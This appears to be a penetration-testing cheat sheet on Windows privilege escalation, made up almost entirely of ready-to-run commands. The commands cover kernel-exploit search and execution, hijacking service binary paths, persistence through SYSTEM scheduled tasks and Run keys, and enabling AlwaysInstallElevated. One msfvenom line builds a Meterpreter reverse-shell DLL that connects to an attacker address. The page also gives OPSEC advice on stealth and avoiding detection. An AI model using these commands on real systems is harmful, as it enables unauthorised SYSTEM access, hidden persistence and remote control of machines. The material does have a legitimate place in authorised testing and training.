Windows Privilege Escalation

Overview

Privilege escalation in Windows involves techniques to gain higher-level access, typically from a normal user to SYSTEM or Domain Admin privileges.

Kernel Exploits

1. System Information

# OS Version
systeminfo
Get-WmiObject -Class Win32_OperatingSystem

# Hotfixes
wmic qfe list
Get-HotFix

# Architecture
wmic os get osarchitecture
[Environment]::Is64BitOperatingSystem

2. Exploit Search

# Manual Search
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"Hotfix(s)"

# Automated Tools
.\windows-exploit-suggester.py --database 2021-03-23-mssb.xls --systeminfo systeminfo.txt
.\Sherlock.ps1 -Command "Find-AllVulns"

3. Exploit Execution

# Compile Exploit
cl.exe /EHsc exploit.cpp
link.exe exploit.obj

# Run Exploit
.\exploit.exe

Service Exploitation

1. Service Enumeration

# List Services
Get-Service
Get-WmiObject -Class Win32_Service

# Service Permissions
Get-Acl -Path "HKLM:\System\CurrentControlSet\Services\*" | Format-List
Get-Service | Get-Member -MemberType Property

2. Service Misconfiguration

# Unquoted Service Path
Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -notlike '"*"' -and $_.PathName -like '* *' }

# Weak Service Permissions
Get-Service | ForEach-Object { $service = $_; $acl = Get-Acl "HKLM:\System\CurrentControlSet\Services\$($service.Name)"; if ($acl.Access.FileSystemRights -match 'Write|Modify') { $service.Name } }

3. Service Manipulation

# Modify Service
sc.exe config <service> binPath= "C:\path\to\malicious.exe"
sc.exe config <service> obj= "LocalSystem"

# Start Service
sc.exe start <service>
Start-Service -Name <service>

DLL Hijacking

1. DLL Search Order

# Check DLL Search Order
Get-ChildItem -Path $env:Path -Recurse -Filter *.dll
Get-ChildItem -Path "C:\Windows\System32" -Filter *.dll

# Find Missing DLLs
Get-EventLog -LogName System -Source "Service Control Manager" | Where-Object { $_.Message -like "*DLL*" }

2. DLL Injection

# Create Malicious DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f dll -o malicious.dll

# Inject DLL
rundll32.exe malicious.dll,EntryPoint

Scheduled Tasks

1. Task Enumeration

# List Tasks
schtasks /query /fo LIST /v
Get-ScheduledTask
Get-WmiObject -Class Win32_ScheduledJob

# Task Permissions
Get-ScheduledTask | ForEach-Object { $task = $_; $acl = Get-Acl "C:\Windows\System32\Tasks\$($task.TaskName)"; if ($acl.Access.FileSystemRights -match 'Write|Modify') { $task.TaskName } }

2. Task Creation

# Create Task
schtasks /create /tn "Update" /tr "C:\path\to\malicious.exe" /sc onlogon /ru SYSTEM
New-ScheduledTask -Action (New-ScheduledTaskAction -Execute "C:\path\to\malicious.exe") -Trigger (New-ScheduledTaskTrigger -AtLogon) -Principal (New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount) | Register-ScheduledTask -TaskName "Update"

Registry Exploitation

1. Registry Enumeration

# AutoRun Keys
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

# AlwaysInstallElevated
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated

2. Registry Modification

# Add AutoRun
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update" -Value "C:\path\to\malicious.exe"

# Enable AlwaysInstallElevated
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -Value 1

Tools

1. Primary Tools

PowerUp
WinPEAS
Sherlock
Windows-Exploit-Suggester
Seatbelt

2. Additional Tools

PowerSploit
Empire
Covenant
Cobalt Strike
Sliver

Best Practices

1. Escalation Strategy

Start with low-risk techniques
Use multiple methods
Document findings
Test safely
Follow engagement scope

2. OPSEC Considerations

Use stealth techniques
Avoid detection
Monitor for alerts
Use legitimate tools
Follow engagement scope

Resources

Last Updated: 2025-03-23

PreviousActive Directory Certificate Services (ADCS)NextWinPrivEsc Enumeration

Last updated 8 months ago

hashtagOverview

hashtagKernel Exploits

hashtag1. System Information

hashtag2. Exploit Search

hashtag3. Exploit Execution

hashtagService Exploitation

hashtag1. Service Enumeration

hashtag2. Service Misconfiguration

hashtag3. Service Manipulation

hashtagDLL Hijacking

hashtag1. DLL Search Order

hashtag2. DLL Injection

hashtagScheduled Tasks

hashtag1. Task Enumeration

hashtag2. Task Creation

hashtagRegistry Exploitation

hashtag1. Registry Enumeration

hashtag2. Registry Modification

hashtagTools

hashtag1. Primary Tools

hashtag2. Additional Tools

hashtagBest Practices

hashtag1. Escalation Strategy

hashtag2. OPSEC Considerations

hashtagResources

Overview

Kernel Exploits

1. System Information

2. Exploit Search

3. Exploit Execution

Service Exploitation

1. Service Enumeration

2. Service Misconfiguration

3. Service Manipulation

DLL Hijacking

1. DLL Search Order

2. DLL Injection

Scheduled Tasks

1. Task Enumeration

2. Task Creation

Registry Exploitation

1. Registry Enumeration

2. Registry Modification

Tools

1. Primary Tools

2. Additional Tools

Best Practices

1. Escalation Strategy

2. OPSEC Considerations

Resources